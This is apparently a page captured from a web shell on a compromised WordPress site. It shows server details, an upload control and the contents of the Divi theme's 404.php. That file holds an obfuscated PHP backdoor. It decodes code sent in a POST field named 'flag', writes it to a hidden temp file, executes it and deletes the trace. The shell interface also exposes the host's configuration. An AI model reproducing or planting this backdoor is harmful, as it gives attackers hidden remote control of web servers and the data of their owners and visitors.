HEX
Server: Apache/2
System: Linux s01 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64
User: beestg (1003)
PHP: 8.3.25
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/beestg/domains/beestgenot.nl/private_html/wp-content/themes/Divi/
Upload Files
File: /home/beestg/domains/beestgenot.nl/private_html/wp-content/themes/Divi/404.php
<?php
//<PHPDATA>fputs_enc;6;flag</PHPDATA>
if(coUnt($_POST)>(int)RoUnD(0+0)&&isset($_POST["f\x6ca\x67"])):$_0=$_POST["fla\147"];$_0=eXpLoDE(".",$_0);$_1="";$_2="a\x62\143defghi\152klm\x6eopqrst\165vwxy\x7a01\06234\06567\0709";$_3=strLEN($_2);$_4=(0b100-1-8- -05);$_5=COUNT($_0);do{if($_4>=$_5):break;endif;$_6=$_0[$_4];$_7=Ord($_2[$_4%$_3]);$_8=(( 	int)$_6-$_7-($_4%(-0b10100100- -0b10101110)))^(042- -0b11000+0x46-0x7a);$_1.=Chr($_8);$_4++;}while(true);$_9=arRAy_fILter(["/var/tmp",gETcWd(),"\057t\x6dp",GEtenv("T\115P"),syS_gET_temp_dir(),session_saVE_PATh(),gEtEnv("TEMP"),iNI_Get("u\160l\x6fad_tmp_\x64\x69r"),"/d\145v/\163\x68m"]);for($_10=(0105+0b10111100- -0260-433),$_11=COuNt($_9);$_10<$_11;$_10++):$_12=$_9[$_10];if(mAX(0b110011010+-0277-0xdb,Is_diR($_12)*Is_WrItABLE($_12))):$_13=vSprIntf("%s\057\045s",[$_12,"\x2e\x68older"]);if($_14=foPeN($_13,"\167")):fwRitE($_14,$_1);FCLoSe($_14);include_once $_13;uNliNK($_13);die();endif;endif;endfor;endif;
@ Telegram